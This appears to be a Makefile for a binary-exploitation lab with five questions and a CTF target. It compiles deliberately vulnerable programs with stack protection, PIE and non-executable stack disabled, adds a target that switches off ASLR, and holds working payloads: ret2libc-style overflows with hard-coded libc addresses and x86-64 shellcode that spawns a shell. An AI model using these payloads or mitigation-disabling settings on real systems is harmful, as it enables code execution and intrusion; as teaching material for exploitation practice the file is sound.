.PHONY: q1 q2 q3 ctf guess_q1 init_q2 exploit_q1 exploit_q3 ctf_great_again q4 exploit_q4 q5 desac_aslr

desac_aslr:
	sudo echo 0 > /proc/sys/kernel/randomize_va_space

################# Q1 #################
guess_q1: guess_q1.c
	gcc -mpreferred-stack-boundary=2 -fno-stack-protector -m32 -fno-pie -no-pie guess_q1.c -o xx
	./xx

q1: q1.c
	gcc -mpreferred-stack-boundary=2 -fno-stack-protector -m32 -fno-pie -no-pie q1.c -o q1
	./q1

exploit_q1:
	./q1 $$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x90"*(12)+b"\x50\xa0\xdd\xf7"+b"\xc0\x4d\xdc\xf7"+b"\x72\x56\xf4\xf7 ")')


################# Q2 #################
init_q2:
	python3 -m pip install ROPgadget
	ROPgadget --help

q2: q2.c
	gcc -Wall -g -fno-stack-protector -mpreferred-stack-boundary=4 -fno-pie q2.c -o q2 -static

################# Q3 #################
q3: q3.c
	gcc q3.c -o q3

exploit_q3:
	./q3 $$(python3 -c "import struct,sys; BUFSIZE=16; p=b'E'*(BUFSIZE)+b'F'*16+b'G'*(BUFSIZE-1)+b'\x00'; sys.stdout.buffer.write(p)")

ctf_great_again: ctf.c
	gcc ctf.c -o ctf

################# Q4 #################
q4: q4.c
	gcc q4.c -o q4

exploit_q4:
	./q4 $$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x42"*(8)+b"\xe0\x11\xde\xf7\xff\x7f")') sh

################# Q5 #################
q5: q5.c
	gcc -z execstack -no-pie q5.c -o q5

exploit_q5:
	./q5 "$$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x48\x31\xd2\x48\x31\xf6\x48\xb8\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd8\x50\x48\x89\xe7\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"+b"\x08\x30\x40")')" "$$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x40\xde\xff\xff\xff\x7f")')"